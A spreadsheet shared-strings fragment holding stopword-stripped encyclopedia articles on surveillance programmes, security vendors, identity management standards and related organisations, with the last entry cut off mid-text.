  <si>
    <t>Karma Police (surveillance programme)</t>
  </si>
  <si>
    <t>karma police (usually capitalised karma police) code name internet mass surveillance data collection programme operated united kingdom's government communications headquarters (gchq). 2015, documents obtained intercept u.s. national security agency whistleblower edward snowden revealed gchq carried karma police operation since 2008. karma police operation swept address internet users visiting websites. program established public scrutiny oversight. karma police powerful spying tool conjunction gchq programs, addresses could cross-referenced data. goal program, according documents, "either browsing profile every visible user internet, user profile every visible website internet."karma police apparently named radiohead song "karma police", includes lyric "this you’ll mess us". also tempora another programme revealed snowden joint threat research intelligence group another gchq programme website visitor tracking browsing history analytics mining internet privacy mass surveillance united kingdom references</t>
  </si>
  <si>
    <t>Securly</t>
  </si>
  <si>
    <t>securly, inc. privately held american company based jose, california incorporated delaware. develops sells internet filters technologies primary secondary educational institutions. founded 2013. securly uses natural language processing machine learning monitor students' browsing, searches, video watching, social media posts, emails, online documents, drives. acquisitions securly's growth broad edtech platform combination organically built product lines filter, aware, visitor (vms), mdm, home, well following inorganic acquisitions: techpilot labs (classroom products), https://blog.securly.com/2019/03/11/securly-announces-techpilotlabs-acquisition/ rhithm, https://www.businesswire.com/news/home/20220421005980/en/securly-acquires-rhithm dyknow, https://www.businesswire.com/news/home/20220301005819/en/securly-acquires-dyknow reception securly criticized providing tools empower school censor content invade students' privacy. 2017, milwaukee journal sentinel reported arrowhead high school's implementation securly, received pushback parents students. points contention included risk securly hacked, value students' browsing search history insurance companies advertisers, general privacy. securly's ceo, bharath madhusudan, stated securly monitors social media retains data months. common sense media director girard kelly said events like cambridge analytica scandal equifax data breach show need protect students' data, arguing securly opposite normalizing "surveillance state" students give data without consent.securly many service providers enabling compliance state federal requirements children's internet protection (cipa). these laws require schools enough digital surveillance protect students online safety concerns including cyberbullying, sexual solicitation, adult content radicalization. securly says service allows schools achieve legal mandate surveillance maintaining balance security privacy. securly claimed services help prevent school shootings, criticized providing data supports claim.securly claims saved 1596 student lives across 15,000 schools analyzed billion activities. references external links securly homepage</t>
  </si>
  <si>
    <t>Kantara Initiative</t>
  </si>
  <si>
    <t>kantara initiative, inc. 'commons' ethos ethics operated c(6) non-profit industry professional trade association works develop standards identity personal data management. focuses improving trustworthy identity personal data area digital identity management data privacy. kantara translates “wooden bridge” kiswahili, hybrid language arabic bantu, that’s showcased bridge kantara’s logo. name attributed sakimura, kantara founding board director open foundation chair, spent childhood africa. kantara drafts technical specifications recommendations industry submits sdos organization advancement structured information standards (oasis), world wide consortium (w3c), internet engineering task force (ietf) sc27 (security techniques) working group (identity management privacy) international organization standardization (iso). kantara provides input policy bodies oecd seat itac, uncitral working group (electronic commerce) well inter-government initiatives related identity management personal data agency. kantara operates distinct programs digital identity personal data privacy community applied (called kipi kantara identity privacy incubator) trust framework assurance. trust framework assurance program involves creating assessment criteria publicly available industry sector standards specifications, undertaking conformity assessment provider's service seeking compliance subsequent granting trust marks, along associated governance. projects kantara assurance framework facilitates party assessment assurance providers' services seeking conformance nist 800-63-3 aal2, expected extend fal2 later 2019. kantara consent receipt specification v1.1 underwent minor revision, simultaneously generic broader based information sharing framework (from consent receipt partly derived) developed response community feedback interested standardizing expanding suite profiles. example consent receipt referenced standard iso/iec 29184 online privacy notices consent. according initiative's executive director, idea behind consent receipt individuals companies able maintain manage permissions personal data. kantara user-managed access (uma) specification standardized extensions oauth aimed asynchronous user permissioning delegated authorization stabilized v2.0 early adopter implementers standardizing profiles extensions. business legal framework developed complement technical protocol framework already completed. received best innovation security award european identity cloud conference 2014.of completed projects, following noteworthy: kantara completed project incubating idpro project 2017. idpro industry association digital identity professionals. kantara continue develop body knowledge good idpro community. this effort kicked 2016 electronic pledge digital identity professionals signify support digital identity professional association kantara’s principles. kantara completed applied project rutgers university’s command, control interoperability center advanced data analysis (ccicada), department homeland security university center excellence, main component kipi (kantara identity privacy incubator) program. projects progress three phases transition commercialization mobile device attribute verification (mdav) nfc4pacs. kantara's grant funding currently centers around ngi_trust project european commission's h2020 program) kantara europe consortium partner. kantara's publishes outputs workgroups website free download. history initiative established 2009 group identity management (idm) technical interoperability organizations using bi-cameral system governance. responding industry consortia fragmentation, kantara aimed form unified, transparent inclusive member organization digital identity community stakeholders. marked 10th anniversary 2019. 2011, kantara focused serving needs relying parties. kantara developing assessment, assurance trust marks federated trust frameworks, well developing urgently needed specifications quicker lengthy processes undertaken standards development organizations (sdos). private public sector relying party organizations (initially united states, worldwide) joined initiative develop identity credential requirements operate conformance assurance programs, thus complementing missions outputs industry consortia, pdec (personal data ecosystem consortium), customer commons carin alliance, identity commons, fido alliance idesg (assets transitioned kantara educational foundation june 2018). formerly affiliate program ieee-isto, kantara initiative self-incorporated 501(c)6 nonprofit organization january 2016. 2018 financially separate similarly missioned branded organizations established mittetulundusuhing kantara initiative europe, estonian based trade association, kantara initiative educational foundation inc, incorporated 501(c)3 references</t>
  </si>
  <si>
    <t>Kampyle (software)</t>
  </si>
  <si>
    <t>kampyle software website feedback analytics company founded 2007 based ramat gan, israel. kampyle's feedback service used improve company's ability understand website users customer analytics. kampyle acquired medallia october 2016. overview company's instant feedback enabled part feedback button placed websites, survey feedback option. software also rater, whereby users rate website satisfaction scale five. such feedback enable companies webmasters assess consumer satisfaction websites discovery problems websites. kampyle's service also enables companies generate sales lead generation customers "identify sales prospects".the feedback platform language translations. 2008, kampyle's feedback base usable unison google analytics, analytics service provided google tracks reports website traffic, nuconomy, enabling "side-by-side analysis user feedback website analytics". company's software also used mobile phones retail stores. history kampyle founded 2007 ariel finkelstein, eylon steiner eran savir, began providing products consumers 2008. company acquired medallia october 2016. also customer feedback management services landing page optimization analytics usability references further reading performance marketing google analytics. john wiley sons. 216–217. kampyle ties user feedback website analytics carthy, (february 2011). "kampyle transforms user feedback into lead generation". techcrunch. retrieved september 2016. external links official website</t>
  </si>
  <si>
    <t>Identity verification service</t>
  </si>
  <si>
    <t>identity verification service used businesses ensure users customers provide information associated identity real person. service verify authenticity physical identity documents drivers license, passport, nationally issued identity document documentary verification. additionally, also involve verification identity information (fields) independent authoritative sources, credit bureau proprietary government data. background identity verification services developed help companies comply anti-money laundering (aml) know your customer (kyc) rules, identity verification vital component transaction ecosystems ecommerce companies, financial institutions, online gaming, even social media. through adopting digital fraud prevention methods, businesses achieve compliance addressing risks associated fraud.in financial industries, verifying identity often required regulations known know your customer customer identification program. many bodies regulating procedures financial crimes enforcement network (fincen). financial actions task force (fatf) global anti-money laundering terrorist financing watchdog organization. non-documentary identity verification requires user customer provide personal identity data sent identity verification service. service checks public proprietary private databases match information provided. optionally, knowledge-based authentication questions presented person providing information ensure owner identity. identity "score" calculated, identity user customer either given "verified" status not, based score. customers various businesses, retail merchants, government entities, financial institutions, often required present identification complete transaction. instance, merchant require customer identification various types purchases (e.g., alcohol, lottery, tobacco purchases) certain types payments (e.g., checks, credit cards) presented transactions. financial institutions usually require customers present form identification complete withdrawal deposit transaction, cash check, open account. government entities require identification access secure areas purposes. other businesses also require identification customers. additional method service identity verification gaining industry prominence artificial intelligence, commonly referred artificial intelligence–based identity verification. verification performed webcam, results available real time accurate untrained eye. however, concerns eurocentric bias artificial intelligence could affect accuracy results. application industries identity verification services include financial services, digital businesses, travel leisure, sharing economy businesses, telecom, fintech, gaming entertainment.identity verification services exist online in-person verify identities. these services used financial service industry, e-commerce platforms, social networking sites, internet forums, dating sites, wikis curb sockpuppetry, underage signups, spamming illegal activities like harassment, identity fraud, money laundering. example, banking, identity verification required order open bank account. there increasing call regulation rise popularity cryptocurrency exchanges. december 2020 u.s. government's financial crimes enforcement network (fincen) proposed rules require banks money service businesses (“msbs”) cryptocurrency wallets submit reports, keep records, verify identity users perform transactions convertible virtual currency. also identity management identity management system references</t>
  </si>
  <si>
    <t>Secutron</t>
  </si>
  <si>
    <t>secutron inc. manufacturer engineered fire alarm systems supported global network authorized engineered systems distributors. secutron registered trademark mircom technologies ltd. part mircom group companies. secutron manufacturing fire alarm systems since 1973, including conventional intelligent fire alarm control panels, fire alarm networks, fire security integration systems, fire alarm accessories. company certified 9001:2008 standards guidelines. industry secutron currently member recognized industry organizations including: national fire protection association (nfpa) california automatic fire alarm association (cafaa) security industry association (sia) fire security association india (fsai)secutron products carry requisite regulatory agency approvals including underwriters laboratories (ul), factory mutual (fm), california state fire marshal (csfm), city york (mea), coast guard, loss prevention certification board (lpcb) american bureau shipping (abs). history secutron founded 1973. 2004 mircom acquired secutron tyco group. external links secutron inc.. mircom group. references</t>
  </si>
  <si>
    <t>Shell Control Box</t>
  </si>
  <si>
    <t>shell control (scb) network security appliance controls privileged access remote systems, records activities replayable audit trails, prevents malicious actions. example, records system administrator updates file server third-party network operator configures router. recorded audit trails replayed like movie review events occurred. content audit trails indexed make searching events automatic reporting possible. linux-based device developed balabit. application level proxy gateway. 2017, balabit changed name product privileged session management (psm) repositioned core module privileged access management solution. main features balabit’s privileged session management (psm), shell control (scb) device controls, monitors, audits remote administrative access servers network devices. tool oversee system administrators controlling encrypted connections used administration. (scb) full control ssh, rdp, telnet, tn3270, tn5250, citrix ica, connections, providing framework (with solid boundaries) work administrators. gateway authentication (scb) acts authentication gateway, enforcing strong authentication users access assets. also integrate user directories (for example, microsoft active directory) resolve group memberships users access protected servers. credentials accessing server retrieved transparently psm’s credential store third-party password management system impersonating authenticated user. this automatic password retrieval protects confidentiality passwords users never access them. access control controls audits privileged access wide-spread protocols ssh, rdp, http(s). detailed access management helps control access servers. also possible control advanced features protocols, like type channels permitted. example, unneeded channels like file transfer file sharing disabled, reducing security risk server. with policies privileged access enforced single system. 4-eyes authorization avoid accidental misconfiguration human errors, supports 4-eyes authorization principle. this achieved requiring authorizer allow administrators access server. authorizer also possibility monitor terminate session administrator real-time, watching screen. real-time monitoring session termination monitor network traffic real time, execute various actions certain pattern (for example, suspicious command, window title text) appears screen. also detect specific patterns credit card numbers. case detecting suspicious user action, send e-mail alert immediately terminate connection. example, block connection destructive administrator command, „rm” comes effect. session recording makes user activities traceable recording tamper-proof confidential audit trails. records selected sessions encrypted, timestamped, digitally signed audit trails. audit trails browsed online, followed real-time monitor activities users. replays recorded sessions like movie actions users seen exactly appeared monitor. balabit desktop player enables fast forwarding replays, searching events (for example, typed commands pressing enter) texts seen user. case problems (database manipulation, unexpected shutdown, etc.) circumstances event readily available trails, thus cause incident identified. addition recording audit trails, transferred files also recorded extracted analysis. also identity references https://www.ssi.gouv.fr/entreprise/certification_cspn/balabit-shell-control-box-version-4-0-6-sec3/ https://channel9.msdn.com/blogs/partnerapps/balabits-shell-control-box-isolates-azure-systems-from-intruders https://www.ovum.com/research/swot-assessment-balabit-shell-control-box-version-4-f1/ https://www.kuppingercole.com/report/ev71570 https://www.techvalidate.com/product-research/balabit-privileged-access-management https://cybersecurity-excellence-awards.com/candidates/shell-control-box/ https://finance.yahoo.com/news/balabit-introduces-shell-control-box-163711081.html http://www.computerworlduk.com/security/how-balabit-adapted-machine-learning-secure-privileged-account-blind-spot-3642389/ https://citrixready.citrix.com/balabit-s-a/privileged-session-management.html https://azuremarketplace.microsoft.com/en-us/marketplace/apps/balabit.balabit-shell-control-box?tab=overview https://marketplace.microfocus.com/arcsight/content/balabit-shell-control-box https://liebsoft.com/partners/technology-integrations/balabit/https://channel9.msdn.com/blogs/partnerapps/balabits-shell-control-box-isolates-azure-systems-from-intruders</t>
  </si>
  <si>
    <t>Imperva</t>
  </si>
  <si>
    <t>imperva cyber security software services company provides protection enterprise data application software. company headquartered mateo, california. history imperva, originally named webcohort, founded 2002 shlomo kramer, amichai shulman mickey boodaei. following year company shipped first product, securesphere application database protection, application firewall. 2004, company changed name imperva.in 2011, imperva went public listed york stock exchange (nyse: impv). august 2014, imperva named anthony bettencourt ceo. 2016, published free scanner designed detect devices infected with, vulnerable mirai botnet.in february 2017, imperva sold skyfence forcepoint million. august 2017, company named chris hylen, former citrix getgo, president ceo. former ceo, anthony bettencourt, resigned chairman board directors february 2018. 2018, imperva identified google chrome allowing attackers steal information html tags audio video files.in 2019, imperva acquired private equity firm thoma bravo. that year, imperva suffered breach notified customers learned security incident exposed sensitive information users incapsula. chris hylen left october 2019 thoma bravo chairman board, charles goodman, became interim ceo. january 2020, imperva named murphy ceo. acquisitions 2014, imperva acquired complete shares incapsula, cloud application security startup named skyfence, real-time mainframe security auditing assets tomium software. february 2017, company purchased camouflage, data masking company.in august 2018, imperva acquired prevoty, runtime application self-protection (rasp) security company. july 2019, acquired distil networks management capabilities. october 2020, imperva acquired database security startup jsonar undisclosed amount. services imperva’s software stack contains products application data security. provides layered protection ensure company’s website located on-premises, cloud, hybrid environment. application security software includes application firewall (waf), ddos protection, runtime application self-protection (rasp), security, management, account takeover (ato) protection, attack analytics application delivery; data security software includes data activity monitoring (dam), data risk analytics, data masking, discovery assessment file security. awards recognitions 2013, imperva received frost sullivan southeast asia application market share leadership award second consecutive year. 2016, imperva icsa labs’ excellence information security testing award. 2017, imperva featured crn’s security list, coolest identity management data protection vendors. 2018, imperva recognized customers gartner’s peer insight customer choice best wafs year. 2019, imperva recognized frost sullivan asia-pacific vendor year. 2020, company recognized seventh consecutive year leader gartner magic quadrant wafs. references external links official website</t>
  </si>
  <si>
    <t>Imprivata</t>
  </si>
  <si>
    <t>imprivata security company based lexington, massachusetts. founded 2002, imprivata develops sells onesign platform securing employee access desktops, networks applications using single sign-on.in 2017, imprivata 1,700 clients several offices across america, europe australia. imprivata customers primarily healthcare industries. imprivata became public company june 2014, listed york stock exchange, acquired private equity investment firm thoma bravo, 2016. history imprivata founded david ting phil scarfo, developed identity management technology working polaroid corporation’s small business incubator. company shipped first product, onesign enterprise single sign-on appliance, 2004. 2005, imprivata expanded europe, africa middle east, 2006 imprivata founder david ting selected infoworld chief technology officers year.in 2009, imprivata acquired assets identiphi, manufacturer reseller biometric technology, including safsolution product line, 2011, acquired assets validus medical systems santa cruz, california, incorporated imprivata cortext technology.in july, 2016, imprivata announced agreed acquired thoma bravo, private equity firm based francisco, $19.25 share, estimated total $544 million. omar hussain chief executive time. technology imprivata onesign helps companies manage user access authentication. product reviews suggest onesign allows companies enable enterprise applications single sign without requiring custom scripting modifications existing directories. onesign also strengthen user authentication desktops networks replacing passwords range authentication options include finger biometrics, proximity cards, smart cards, many national government cards, one-time-password tokens, employee’s physical location. product reviews also comment onesign's ability simplify compliance reporting consolidating employee strong authentication application access events single database. references external links corporate website</t>
  </si>
  <si>
    <t>SeeVolution</t>
  </si>
  <si>
    <t>seevolution real-time website analytic service shows heatmap website, detailing visitors clicking, mouse moves scrolls. data used allow webmasters areas website visitors using. history seevolution founded cohen 2010. company began offering service free website owners. 2011, company introduced premium features also kept free platform.in 2011, company secured $530,000 angel financing. they also passed milestone installed 2,500 websites. investment brought total funding angel investors $730,000. order keep demand product, company secured additional round angel funding 2012. products services seevolution uses x-ray tool capture data users interact different parts website. data collected includes mouse clicks, data entries, navigational information. data used create heatmap overlays webpage show visitors moving mouse, clicking scroll specific page. allows user data real-time also provides event notifications.the product works installing simple javascript website monitored. after logging heatmap overlay show site, showing clicks page scrolls. also analytics list analytics software references external links official website seevolution review appvita seevolution feature smashing magazine 2010</t>
  </si>
  <si>
    <t>Kaggle</t>
  </si>
  <si>
    <t>kaggle, subsidiary google llc, online community data scientists machine learning practitioners. kaggle allows users find publish data sets, explore build models web-based data-science environment, work data scientists machine learning engineers, enter competitions solve data science challenges. kaggle start 2010 offering machine learning competitions also offers public data platform, cloud-based workbench data science, artificial intelligence education. personnel anthony goldbloom jeremy howard. nicholas gruen founding chair succeeded levchin. equity raised 2011 valuing company $25.2 million. march 2017, google announced acquiring kaggle. kaggle community june 2017, kaggle announced passed million registered users, kagglers, 2021 million registered users. community spans countries. diverse community, ranging starting many world's best known researchers.by march 2017, sigma investments fund running competition kaggle code trading algorithm. kaggle competitions work competition host prepares data description problem. participants experiment different techniques compete produce best models. work shared publicly kaggle kernels achieve better benchmark inspire ideas. submissions made kaggle kernels, manual upload using kaggle api. competitions, submissions scored immediately (based predictive accuracy relative hidden solution file) summarized live leaderboard. after deadline passes, competition host pays prize money exchange worldwide, perpetual, irrevocable royalty-free license [...] winning entry", i.e. algorithm, software related intellectual property developed, "non-exclusive unless otherwise specified".alongside public competitions, kaggle also offers private competitions limited kaggle's participants. kaggle offers free tool data science teachers academic machine learning competitions. kaggle also hosts recruiting competitions data scientists compete chance interview leading data science companies like facebook, winton capital, walmart. impact kaggle competitions kaggle hundreds machine learning competitions since company founded. competitions ranged improving gesture recognition microsoft kinect making football manchester city improving search higgs boson cern.competitions resulted many successful projects including furthering state research, chess ratings traffic forecasting. geoffrey hinton george dahl used deep neural networks competition hosted merck vlad mnih (one hinton's students) used deep neural networks competition hosted adzuna. this resulted technique taken others kaggle community. tianqi chen university washington also used kaggle show power xgboost, since taken random forest main methods used kaggle competitions. several academic papers published basis findings made kaggle competitions. effect live leaderboard, encourages participants continue innovating beyond existing best practice. winning methods frequently written kaggle blog, kaggle winner's blog. financials march 2017, fei-fei chief scientist google, announced google acquiring kaggle keynote google next. also data science competition platform anthony goldbloom references further reading "competition shines light dark matter", office science technology policy, whitehouse website, june 2011 "may best algorithm win...", wall street journal, march 2011 "kaggle contest aims boost wikipedia editors", scientist, july 2011 archived 2016-03-22 wayback machine "verification systems biology research collaborative competition", nature nanotechnology, september 2011</t>
  </si>
  <si>
    <t>In the Realm of the Hackers</t>
  </si>
  <si>
    <t>realm hackers 2003 australian documentary directed kevin anderson prominent hacker community, centered melbourne, australia late 1980s early 1990. storyline centered australian teenagers going hacker names "electron" "phoenix", members elite computer hacking group called 'the realm' hacked secure computer networks world, including naval research laboratory, lawrence livermore national laboratory, government charged security nuclear stockpile, nasa. film runs minutes inspired book underground, melbourne-based writer academic suelette dreyfus. also electron (computer hacker) nahshon even-chaim underground: tales hacking, madness obsession electronic frontier hacktivism references external links</t>
  </si>
  <si>
    <t>Incapsula</t>
  </si>
  <si>
    <t>imperva incapsula american cloud-based application delivery platform. uses global content delivery network provide application security, ddos mitigation, content caching, application delivery, load balancing failover services. history incapsula founded 2009 shatz marc gaffan. company origins imperva (nyse:impv), american-based cyber security firm owned incapsula. spun imperva 2009. while reported growing rate 50%, 102% quarter august 2013, company lost $1.7 million second quarter year. february 2014 imperva bought remaining part incapsula became product line within parent company. october 2013 incapsula credited protected internet's largest attacks website. september 2013 attack said lasted nine hours 100gbit/s traffic peak. attack china, bitcoin yuan trading platform.in december 2016 incapsula reported defended largest ddos attack recorded, peaked 650gbit/s 200mpps. service features incapsula multiple features used security performance websites: application delivery control (adc) content delivery network (cdn) ddos mitigation global server load-balancing (gslb) application firewall (waf)incapsula protects websites changing domain name system (dns) records route traffic incapsula. incapsula filters malicious attacks bots website scrapers. 2011 effective cross site scripting, illegal resource access owasp threats, injections, threats including academic archiving, comment spam, fake registrations, malicious bots, referrer spam, site scraping. incapsula also content delivery network caches websites server network speed website load time. cached information returned server closest user provide fast page loads. this also allegedly militates slow responses heavy server traffic.incapsula launched tool named "backdoor protect" 2013. tool reported detect block malicious back-doors "webshells". tool works comparing website's traffic database known back-doors. later year, company announced factor authentication feature called login-protect, integrated feature products. incapsula also announced 2013 would implementing layer load balancing capabilities. awards recognition 2011, incapsula chosen companies participate conference innovation sandbox. year, finalist herring north america award.in 2013, incapsula named best cloud based security werockyourweb.the 2017 forrester wave ddos service providers named imperva leader scores "current offering" "strategy" evaluated ddos service providers. references external links official website company blog</t>
  </si>
  <si>
    <t>ImmuniWeb</t>
  </si>
  <si>
    <t>immuniweb global application security company headquartered geneva, switzerland. immuniweb develops machine learning technologies saas-based application security solutions provided proprietary immuniweb platform. early security research security advisories immuniweb security research team (formerly known high-tech bridge) released security advisories affecting various software, issues identified products many well-known vendors, sony, mcafee novell, addition many vulnerabilities affecting popular open source commercial applications, oscommerce, cart, microsoft sharepoint, sugarcrm others. security research registered compatible mitre. organizations, globally, first switzerland, able achieve certification. company listed among organizations, august 2013, include identifiers security advisories. free online services related research immuniweb launched ssl/tls configuration testing tool october 2015. tool validates email, server configuration nist guidelines checks compliance, cited articles covering talktalk data breach. security privacy research discovery vulnerabilities yahoo! sites company widely reported, leading t-shirt gate affair changes yahoo's bounty program. firm identified reported four vulnerabilities yahoo! domains, company awarded gift vouchers value $25. sparse reward offered security researchers identifying vulnerabilities yahoo! criticized, sparking came called t-shirt-gate, campaign yahoo! sending t-shirts thanks discovering vulnerabilities. company's discovery vulnerabilities subsequent criticism yahoo!'s reward program yahoo! rolling vulnerability reporting policy offers $150 $15,000 reported issues, based pre-established criteria.in december 2013, firm's research privacy popular social networks email services cited class action lawsuit allegedly violating members' privacy scanning private messages sent social network. october 2014 company discovered remote code execution vulnerabilities php. december 2014, identified ransomweb attack, development ransomware attacks, hackers started taking webs servers, encrypting data demanding payment unlock files. april 2014, discovery sophisticated drive-by download attacks, revealed drive-by download attacks used target specific website visitors authentication compromised resource. december 2015, company tested popular free email service providers, ssl/tls email encryption. hushmail, previously considered secure email providers, received failing grade. just after, company updated configuration received score "b+". references external links official website also penetration test</t>
  </si>
  <si>
    <t>InciWeb</t>
  </si>
  <si>
    <t>inciweb interagency all-risk incident information management system provided united states forest service released 2004. originally developed wildland fire emergencies, also used emergency incidents (natural disasters, earthquakes, floods, hurricanes, tornadoes). introduction developed primary missions: provide public single source incident related information provide standardized reporting tool public affairs communityofficial announcements include evacuations, road closures, news releases, maps, photographs, basic info current situation incident. incident information accessed browser http://inciweb.nwcg.gov twitter feed technical original application hosted united states forest service wildland fire training conference center, mcclellan airfield, california, comprising three servers: database server administrative server load balancer public content routes traffic pool eight servers.web traffic averages million plus hits daily fire season ability handle million hits. servers moved national information technology center (nitc), kansas city, missouri july 2008, along release version 2.0; current version 2.2. availability issues inciweb technical difficulties high volume internet users trying access site september–october 2006 fire summer 2008 california wildfires. participating agencies united states forest service bureau land management bureau indian affairs fish wildlife service national park service national oceanic atmospheric administration department interior office aircraft services national association state foresters united states fire administrationthese agencies also national interagency fire center. also incident command system incident management references external links inciweb official website judith downing, ronald hodgson, jonathan taylor, shana gillette. fire information communities risk interface wildfires: lessons learned from 2003 southern california megafires. pages 135-152 fire social science research from pacific southwest research station: studies supported national fire plan funds. august 2008. united states forest service. inciweb mentioned page 139, footnote</t>
  </si>
  <si>
    <t>Identity provider</t>
  </si>
  <si>
    <t>identity provider (abbreviated idp) system entity creates, maintains, manages identity information principals also provides authentication services relying applications within federation distributed network.identity providers offer user authentication service. relying party applications, applications, outsource user authentication step trusted identity provider. such relying party application said federated, consumes federated identity. identity provider trusted provider lets single sign-on (sso) access websites.” enhances usability reducing password fatigue. also provides better security decreasing potential attack surface. identity providers facilitate connections cloud computing resources users, thus decreasing need users re-authenticate using mobile roaming applications. types identity providers indieauth identity provider indieauth open standard decentralized authentication protocol uses oauth enables services verify identity user represented well obtain access token used access resources control user. indieauth model, user’s identity links preferred identity provider, site, delegated third party authorization endpoint. openid provider openid connect (oidc) identity layer oauth. domain model associated oidc, identity provider special type oauth authorization server. specifically, system entity called openid provider issues json-formatted identity tokens oidc relying parties restful http api. saml identity provider security assertion markup language (saml) profiles exchanging authentication authorization data across security domains. saml domain model, identity provider special type authentication authority. specifically, saml identity provider system entity issues authentication assertions conjunction profile saml. relying party consumes authentication assertions called saml service provider. also federated identity identity management system saml identity provider references</t>
  </si>
  <si>
    <t>Identity management</t>
  </si>
  <si>
    <t>ITSEC</t>
  </si>
  <si>
    <t>information technology security evaluation criteria (itsec) structured criteria evaluating computer security within products systems. itsec first published 1990 france, germany, netherlands, united kingdom based existing work respective countries. following extensive international review, version subsequently published june 1991 commission european communities operational within evaluation certification schemes. since launch itsec 1990, number european countries agreed recognize validity itsec evaluations. itsec largely replaced common criteria, provides similarly-defined evaluation levels implements target evaluation concept security target document. concepts product system evaluated, called target evaluation, subjected detailed examination security features culminating comprehensive informed functional penetration testing. degree examination depends upon level confidence desired target. provide different levels confidence, itsec defines evaluation levels, denoted higher evaluation levels involve extensive examination testing target. unlike earlier criteria, notably tcsec developed defense establishment, itsec require evaluated targets contain specific technical features order achieve particular assurance level. example, itsec target might provide authentication integrity features without providing confidentiality availability. given target's security features documented security target document, whose contents evaluated approved target evaluated. each itsec evaluation based exclusively verifying security features identified security target. formal notation used prove security properties mondex smart card electronic cash system, allowing achieve itsec level highest granted security-level classification. references bibliography itsec (june 1991). "information technology security evaluation criteria (itsec): preliminary harmonised criteria" (pdf). document com(90) 314, version 1.2. commission european communities. archived original (pdf) 2006-05-23. retrieved 2006-06-02.</t>
  </si>
  <si>
    <t>ITU-T</t>
  </si>
  <si>
    <t>telecommunication standardization sector (itu-t) coordinates standards telecommunications information communication technology x.509 cybersecurity, y.3172 y.3173 machine learning, h.264/mpeg-4 video compression, member states, private sector members, academia members. itu-t three sectors (divisions units) international telecommunication union (itu). standardization efforts started 1865 formation international telegraph union, later became international telecommunication union (itu). became specialized agency united nations 1947. international telegraph telephone consultative committee (french: comité consultatif international téléphonique télégraphique, ccitt) created 1956, renamed itu-t 1993.the first meeting world telecommunication standardization assembly (wtsa), sector's governing conference, took place march year. itu-t permanent secretariat called telecommunication standardization bureau (tsb), based headquarters geneva, switzerland. current director chaesub lee, whose first 4-year term commenced january 2015, whose second 4-year term commenced january 2019. chaesub succeeded malcolm johnson united kingdom, director january 2007 december 2014. primary function itu-t mission ensure efficient timely production standards covering fields telecommunications information communication technology (icts) worldwide basis, well defining tariff accounting principles international telecommunication services.the international standards produced itu-t referred "recommendations" (with word capitalized distinguish meaning common parlance sense word "recommendation"), become mandatory adopted part national law. since itu-t part itu, united nations specialized agency, standards carry formal international weight standards development organizations publish technical specifications similar form. history initiative napoleon iii, french government invited international participants conference paris 1865 facilitate regulate international telegraph services. result conference founding forerunner modern itu.at 1925 paris conference, created consultative committees deal complexities international telephone services, known ccif, french acronym, long-distance telegraphy (ccit).in view basic similarity many technical problems faced ccif ccit, decision taken 1956 merge single entity, international telegraph telephone consultative committee (ccitt, french acronym). first plenary assembly organization held geneva, switzerland december 1956. 1992, plenipotentiary conference (the policy-making conference itu) reform itu, giving union greater flexibility adapt increasingly complex, interactive competitive environment. ccitt renamed telecommunication standardization sector (itu-t), three sectors union alongside radiocommunication sector (itu-r) telecommunication development sector (itu-d).historically, recommendations ccitt presented plenary assemblies endorsement, held every four years, full recommendations published plenary assembly. however, delays producing texts, translating working languages, suit fast pace change telecommunications industry. "real time" standardization rise personal computer industry early 1980s created common practice among consumers businesses adopting "bleeding edge" communications technology even standardized. thus, standards organizations forth standards much faster, find ratifying facto standards fact. prominent examples open document architecture project, began 1985 profusion software firms around world still furiously competing shape future electronic office, completed 1999 long microsoft office's then-secret binary file formats become established global facto standard. itu-t operates much streamlined processes. time initial proposal draft document member company final approval full-status itu-t recommendation short months less cases). this makes standardization approval process itu-t much responsive needs rapid technology development itu's historical past. updated recommendations published almost daily basis, nearly library 3,270 recommendations free charge online. (about specifications jointly maintained itu-t iso/iec available free public.) itu-t moreover tried facilitate cooperation various forums standard-developing organizations (sdos). this collaboration necessary avoid duplication work consequent risk conflicting standards market place.in work standardization, itu-t cooperates sdos, e.g., international organization standardization (iso) internet engineering task force (ietf). development recommendations most work itu-t carried sector members associates, telecommunication standardization bureau (tsb) executive itu-t coordinator number workshops seminars progress existing work areas explore ones. events cover wide array topics field information communication technologies (ict) attract high-ranking experts speakers, attendees engineers high-level management industry sectors.the technical work, development recommendations, itu-t managed study groups (sgs), study group network standards, study group multimedia standards, study group security standards, created world telecommunication standardization assembly (wtsa) held every four years. part deliberations, wtsa instructed hold global standards symposium, unlike wtsa open public participation. people involved experts telecommunications world. there currently sgs. study groups meet face face virtually exceptional circumstances) according calendar issued tsb. augmented focus groups (fgs), instrument created itu-t, providing quickly react standardization needs allowing great flexibility terms participation working methods. difference latter greater freedom organize finance themselves, involve non-members work, authority approve recommendations. focus groups created quickly, usually short-lived choose working methods, leadership, financing, types deliverables. current focus groups include itu-who focus group artificial intelligence health (fg-ai4h) well machine learning (which developed y.3172), quantum information technologies networks, artificial intelligence assisted autonomous driving. alternative approval process alternative approval process (aap) fast-track approval procedure developed allow standards brought market timeframe industry demands. defined itu-t recommendation a.8.this dramatic overhaul standards-making streamlining approval procedures implemented 2001 estimated time involved critical aspect standardization process percent. this means average standard took around four years approve publish nineties, years 1997, approved average months, little five weeks. besides streamlining underlying procedures involved approval process, important contributory factor electronic document handling. once approval process begun rest process completed electronically, vast majority cases, physical meetings. introduction also formalizes public/private partnership approval process providing equal opportunities sector members member states approval technical standards. panel experts drafts proposal forwarded meeting appropriate body decides sufficiently ready designated draft text thus gives consent review next level. after consent given, announces start procedure posting draft text itu-t website calling comments. this gives opportunity members review text. this phase, called last call, four-week period comments submitted member states sector members. comments editorial corrections received, recommendation considered approved since issues identified might need work. however, comments, chairman, consultation tsb, sets comment resolution process concerned experts. revised text posted additional review period three weeks. similar last call phase, additional review recommendation considered approved comments received. comments received, apparent issues still need work, draft text comments sent next study group meeting discussion possible approval.those recommendations considered policy regulatory implications approved known traditional approval process (tap), allows longer period reflection commenting member states. recommendations also translated working languages (arabic, chinese, english, french, russian, spanish). series recommendations itu-t recommendations names given telecommunications computer protocol specification documents published itu-t. series recommendations itu-t issues recommendations names like x.500, series identifying number. when recommendation updated, (mostly) keep number, year issue necessary identify specific version recommendation. term "x.500" used refer specific x.500 recommendation, entire family recommendations named x.5xx, specific x.500 recommendation forms introduction overview set. vast majority finalized recommendations available electronic (pdf) form free charge all. texts free charge include common itu-t texts special arrangements exist. standards published asn.1 (abstract syntax notation one) coding audio: g.711 g.72x series coding still images: jpeg t.8x, jpeg 2000 t.80x jpeg t.83x series coding video: h.120, h.261, h.262 (mpeg-2 video), h.263, h.264 (mpeg-4 avc), h.265 (hevc), h.266 (vvc) construction, installation protection cables elements outside plant, l-series data 